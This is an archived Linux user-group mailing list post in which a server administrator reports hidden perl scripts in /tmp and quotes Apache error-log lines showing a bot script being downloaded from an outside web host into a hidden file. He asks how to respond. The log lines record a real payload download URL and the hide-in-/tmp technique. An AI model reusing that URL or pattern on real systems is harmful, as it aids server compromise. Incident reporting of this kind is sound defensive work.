-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Here's what I found out more digging in the logs.
There are 3 hidden files (attached with this message) in /tmp/: 1) .fuhrer 2) .fuhrer2 3) .fuhrer3 ns1:/var/log/apache2# ls -la /tmp/ total 56 drwxrwxrwt 5 root root 4096 Nov 25 07:46 . drwxr-xr-x 26 root root 4096 Nov 25 04:49 .. drwxrwxrwt 2 root root 4096 Nov 21 23:32 .ICE-unix drwxrwxrwt 2 root root 4096 Nov 21 23:32 .X11-unix - -rw-r--r-- 1 www-data www-data 3673 Nov 25 00:30 .fuhrer - -rw-r--r-- 1 www-data www-data 18698 Nov 25 06:11 .fuhrer2 - -rw-r--r-- 1 www-data www-data 0 Nov 25 08:10 .fuhrer3 - -rw------- 1 www-data www-data 71 Nov 23 03:28 sess_07f541a848d0dd70fc87c3aed1691c87 - -rw------- 1 www-data www-data 864 Nov 23 01:55 sess_8092654d49176bb860dca7fad5f50cce - -rw------- 1 www-data www-data 342 Nov 22 23:56 sess_e5e56ebacf7fcd31ea42d829e1f1f4fd drwxrwxrwx 3 www-data www-data 4096 Nov 23 01:28 yappa-ng_cache All these 3 are perl scripts, so now it is clear that there are the perl scripts which are running from within apache (I've enabled mod_perl in my apache installation) and eating up the cpu cycles. Now let's look a little of /var/log/apache2/error.log: Resolving maple.phpwebhosting.com... 70.86.76.34 Connecting to maple.phpwebhosting.com[70.86.76.34]:80... connected. HTTP request sent, awaiting response... 200 OK Length: 18,698 [text/plain] 0K .......... ........ 100% 210.37 KB/s 08:07:40 (210.37 KB/s) - `/tmp/.fuhrer2' saved [18698/18698] - --08:07:40-- http://maple.phpwebhosting.com/%7Edarkbroked/linuxdaybot.txt => `/tmp/.fuhrer2' Resolving maple.phpwebhosting.com... 70.86.76.34 Connecting to maple.phpwebhosting.com[70.86.76.34]:80... connected. HTTP request sent, awaiting response... 200 OK Length: 18,698 [text/plain] 0K .......... ........ 100% 211.06 KB/s 08:07:40 (211.06 KB/s) - `/tmp/.fuhrer2' saved [18698/18698] - --08:07:40-- http://maple.phpwebhosting.com/%7Edarkbroked/linuxdaybot.txt => `/tmp/.fuhrer2' Resolving maple.phpwebhosting.com... 70.86.76.34 Connecting to maple.phpwebhosting.com[70.86.76.34]:80... connected. HTTP request sent, awaiting response... 200 OK Length: 18,698 [text/plain] 0K .......... ........ 100% 210.52 KB/s The logs show that the guy uploaded the files to /tmp and hid them. In my first mail, the logs showed a lot of "sh" defunct processes executed from within apache. Is this an attempt to gain the shell through the web server ? Please suggest me what more should I look for and how to tackle this attack. Regards, rrs - -- Ritesh Raj Sarraf RESEARCHUT -- http://www.researchut.com Gnupg Key ID: 04F130BC "Stealing logic from one person is plagiarism, stealing from many is research." "Necessity is the mother of invention." -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.2 (GNU/Linux) iD8DBQFDhz8d4Rhi6gTxMLwRAlMeAKCqhoepp+N5JEjTujHx6qfu6o/9bgCeLlzT yLhBRreUYDj0xF74mSPt3rY= =4FJO -----END PGP SIGNATURE----- _______________________________________________ ilugd mailinglist -- ilugd@lists.linux-delhi.org http://frodo.hserus.net/mailman/listinfo/ilugd Archives at: http://news.gmane.org/gmane.user-groups.linux.delhi http://www.mail-archive.com/ilugd@lists.linux-delhi.org/